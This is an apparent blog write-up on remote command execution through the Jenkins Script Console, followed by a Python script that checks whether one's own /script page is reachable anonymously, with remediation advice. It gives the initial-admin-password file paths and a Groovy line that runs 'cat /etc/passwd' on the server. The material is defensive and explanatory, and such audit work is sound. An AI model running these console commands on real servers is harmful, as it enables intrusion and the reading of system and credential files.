Jenkins script remote command execution vulnerability
Vulnerability Description
After logging in, Jenkins exposes the Script Console at /script, which runs arbitrary Groovy on the server and can therefore execute system commands. When this page is reachable without authentication, anyone who can reach the instance can compromise the server.
Vulnerability Impact
Jenkins
Network surveying and mapping
Vulnerability Reproduction
The initial administrator password is stored at:
Linux: /var/lib/jenkins/secrets/initialAdminPassword
Windows: C:\Users\RabbitMask\.jenkins\secrets\initialAdminPassword
Log in to the administration interface, or open the page directly if the instance allows unauthenticated access:
https://xxx.xxx.xxx.xxx/script
Execute system commands from the Script Console (Groovy):
println 'cat /etc/passwd'.execute().text  // runs the command on the Jenkins server and prints its output
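The exposure described above comes down to one question a defender can answer about their own instance: does an anonymous request to /script get the console, or get refused? The following added example (not code from the original post or from the Jenkins project) classifies the HTTP response to an unauthenticated GET /script without submitting any Groovy. It assumes that an unprotected console renders a page containing a "Script Console" heading and a `name="script"` textarea, that a protected instance answers 401/403 or redirects to /login, and it uses constructed sample responses so the classification can be checked offline.

```python
"""Audit whether a Jenkins Script Console (/script) is reachable anonymously.

Added example, not from the original post. Assumptions (not stated on the page):
 - an unauthenticated console renders HTML containing "Script Console" and
   a <textarea name="script">;
 - a secured instance answers 401/403, or 302-redirects to /login.
"""
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass


@dataclass
class ScriptConsoleFinding:
    status: int
    verdict: str   # "EXPOSED", "PROTECTED" or "UNKNOWN"
    detail: str


# Markers of the console form (assumption about the rendered page).
_CONSOLE_MARKERS = ('name="script"', "Script Console")


def classify_response(status: int, headers: dict, body: str) -> ScriptConsoleFinding:
    """Classify the response to an anonymous GET /script."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if status == 200 and all(m in body for m in _CONSOLE_MARKERS):
        return ScriptConsoleFinding(status, "EXPOSED",
                                    "script console rendered without authentication")
    if status in (401, 403):
        return ScriptConsoleFinding(status, "PROTECTED", "anonymous access denied")
    location = hdrs.get("location", "")
    if status in (301, 302, 303, 307) and "/login" in location:
        return ScriptConsoleFinding(status, "PROTECTED", f"redirected to login: {location}")
    return ScriptConsoleFinding(status, "UNKNOWN", f"unexpected response {status}")


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so a 302 to /login stays visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def audit_script_console(base_url: str, timeout: float = 10.0) -> ScriptConsoleFinding:
    """Send one anonymous GET to <base_url>/script on your own instance and classify it."""
    url = base_url.rstrip("/") + "/script"
    req = urllib.request.Request(url, headers={"User-Agent": "script-console-audit"})
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
            return classify_response(resp.status, dict(resp.headers), body)
    except urllib.error.HTTPError as e:
        # 4xx, and 3xx once redirects are disabled, arrive here with headers intact.
        body = e.read(65536).decode("utf-8", "replace")
        return classify_response(e.code, dict(e.headers), body)


# Constructed sample responses (not captured from a real server) for an offline check.
SAMPLE_RESPONSES = {
    "open":      (200, {}, '<h1>Script Console</h1><textarea name="script"></textarea>'),
    "denied":    (403, {}, "Authentication required"),
    "login":     (302, {"Location": "http://jenkins.example/login?from=%2Fscript"}, ""),
    "dashboard": (200, {}, "<html><body>Dashboard</body></html>"),
}


def demo() -> dict:
    """Classify every constructed sample; returns {name: verdict}."""
    return {name: classify_response(*resp).verdict for name, resp in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        f = audit_script_console(sys.argv[1])
        print(f"{f.verdict} (HTTP {f.status}): {f.detail}")
    else:
        for name, verdict in demo().items():
            print(f"{name:10s} -> {verdict}")
```

Run it with your own instance's base URL to get a single verdict; the request only fetches the page and never posts a script. An EXPOSED result means security is disabled or anonymous users hold Overall/Administer, and the fix is to enable security and restrict Overall/Administer to a small set of accounts (the Script Console requires that permission), after which the same check should report PROTECTED.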
This post is licensed under CC BY 4.0 by the author.